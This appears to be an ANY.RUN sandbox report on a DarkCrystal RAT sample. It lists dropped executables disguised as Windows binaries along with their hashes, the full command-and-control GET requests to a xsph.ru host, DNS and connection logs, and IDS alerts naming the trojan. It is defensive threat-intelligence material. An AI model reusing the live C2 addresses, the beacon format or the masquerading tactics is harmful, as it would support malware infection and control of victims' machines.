6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\found.000\dir_00000002.chk\dasHost.exeexecutable
MD5:D1BFFB7DFD0CCFE6AA48313B65C2EB11
SHA256:BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\Recovery\Logs\SystemSettings.exeexecutable
MD5:D1BFFB7DFD0CCFE6AA48313B65C2EB11
SHA256:BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\Users\Public\Pictures\886983d96e3d3etext
MD5:30D021F1052A6FB16DF182717C1FBF58
SHA256:0CDCE18C2A24BBB91A7CCFA579A1CB400437A198F8FF3F11557F93D9D282AFB8
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\found.000\dir0000.chk\System.exeexecutable
MD5:D1BFFB7DFD0CCFE6AA48313B65C2EB11
SHA256:BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\Users\Public\Pictures\csrss.exeexecutable
MD5:D1BFFB7DFD0CCFE6AA48313B65C2EB11
SHA256:BC65E00E7CFB6F9DE5C996B3D60DFF8012DB0217A5AFD288DC1F29C53EB76DA6
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\Windows\addins\257bc9927e0626text
MD5:B18B8F8CDC9E87C1655056E0C0EF5B27
SHA256:3A951A8570B008CF1FCA0CAF87E928725D1FFB4DB02740DFC5723C8ACBE87B65
6520bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6.exeC:\Windows\Offline Web Pages\9e8d7a4ca61bd9text
MD5:7BB04C9B21A8A07E3CB1771FE47584BA
SHA256:D5B43B0B560B0B5E1D9C70740EFCA2BE5D2A33191E6FADD79861E76458D1CB85
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
22
TCP/UDP connections
29
DNS requests
5
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2392
svchost.exe
GET
200
2.16.164.82:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
7196
dasHost.exe
GET
403
141.8.192.82:80
http://a0949311.xsph.ru/_Defaultwindows.php?hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&hsUTkWeMunIKFod=fTsIy&SRaOxN4ld5K0OmuZz5=LXlmG6&j7kEu1n8ZD2ViQ=JJNAOa0VGe
unknown
unknown
2304
dasHost.exe
GET
403
141.8.192.82:80
http://a0949311.xsph.ru/_Defaultwindows.php?9gOcAJBzR0suqq=3OWG0lVxc0VgSI3QWn&PbU1Vz9EVgH64UAug40Hyotwl=msqXjWH2aGiWBQ0h9RV4b&RYXWff9l=iPqNQX86uzB34LJ2jQQocbr&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&9gOcAJBzR0suqq=3OWG0lVxc0VgSI3QWn&PbU1Vz9EVgH64UAug40Hyotwl=msqXjWH2aGiWBQ0h9RV4b&RYXWff9l=iPqNQX86uzB34LJ2jQQocbr
unknown
unknown
308
dasHost.exe
GET
403
141.8.192.82:80
http://a0949311.xsph.ru/_Defaultwindows.php?iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu
unknown
unknown
308
dasHost.exe
GET
403
141.8.192.82:80
http://a0949311.xsph.ru/_Defaultwindows.php?iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&iKeQE9sE=pyqznDYRJSArLABVXhA6ShR5n7ko&xkq69oi=vDb972FegXKd5qcrIlHgvMpdu
unknown
unknown
324
dasHost.exe
GET
403
141.8.192.82:80
http://a0949311.xsph.ru/_Defaultwindows.php?wEg=qLy4JwBXMYQ12BGdjLelXVBr3&GsJYfZQ=xnQF90AfCPeNnYz5ckk5XUKHA8pTN&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&wEg=qLy4JwBXMYQ12BGdjLelXVBr3&GsJYfZQ=xnQF90AfCPeNnYz5ckk5XUKHA8pTN
unknown
unknown
324
dasHost.exe
GET
403
141.8.192.82:80
http://a0949311.xsph.ru/_Defaultwindows.php?wEg=qLy4JwBXMYQ12BGdjLelXVBr3&GsJYfZQ=xnQF90AfCPeNnYz5ckk5XUKHA8pTN&d25768f30c698c24efd3caf1c2a93bcb=7f778e433ec7c51341864efceb684f99&d10d153e77fe36211bd0a60ff3c00895=AOxETZxMWN1YDO2YjYiVGN1YzM2UWZiFjZwIWYxIDZlZDO0cTYjRGZ&wEg=qLy4JwBXMYQ12BGdjLelXVBr3&GsJYfZQ=xnQF90AfCPeNnYz5ckk5XUKHA8pTN
unknown
unknown
2916
RUXIMICS.exe
GET
200
2.16.164.82:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
5140
MoUsoCoreWorker.exe
GET
200
2.16.164.82:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
5140
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
239.255.255.250:1900
unknown
2392
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5140
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2916
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2392
svchost.exe
2.16.164.82:80
crl.microsoft.com
Akamai International B.V.
NL
unknown
5140
MoUsoCoreWorker.exe
2.16.164.82:80
crl.microsoft.com
Akamai International B.V.
NL
unknown
2916
RUXIMICS.exe
2.16.164.82:80
crl.microsoft.com
Akamai International B.V.
NL
unknown
5140
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
unknown
2392
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
unknown
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.82
  • 2.16.164.96
  • 2.16.164.81
  • 2.16.164.48
  • 2.16.164.97
  • 2.16.164.67
  • 2.16.164.83
  • 2.16.164.88
  • 2.16.164.43
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
a0949311.xsph.ru
  • 141.8.192.82
unknown
self.events.data.microsoft.com
  • 20.189.173.26
whitelisted

Threats

PID
Process
Class
Message
2184
svchost.exe
Misc activity
ET INFO Observed DNS Query to xsph .ru Domain
7260
dasHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
7260
dasHost.exe
A Network Trojan was detected
REMOTE [ANY.RUN] DarkCrystal HTTP GET Request
7260
dasHost.exe
A Network Trojan was detected
REMOTE [ANY.RUN] DarkCrystal HTTP GET Request
7724
dasHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
5656
dasHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
bc65e00e7cfb6f9de5c996b3d60dff8012db0217a5afd288dc1f29c53eb76da6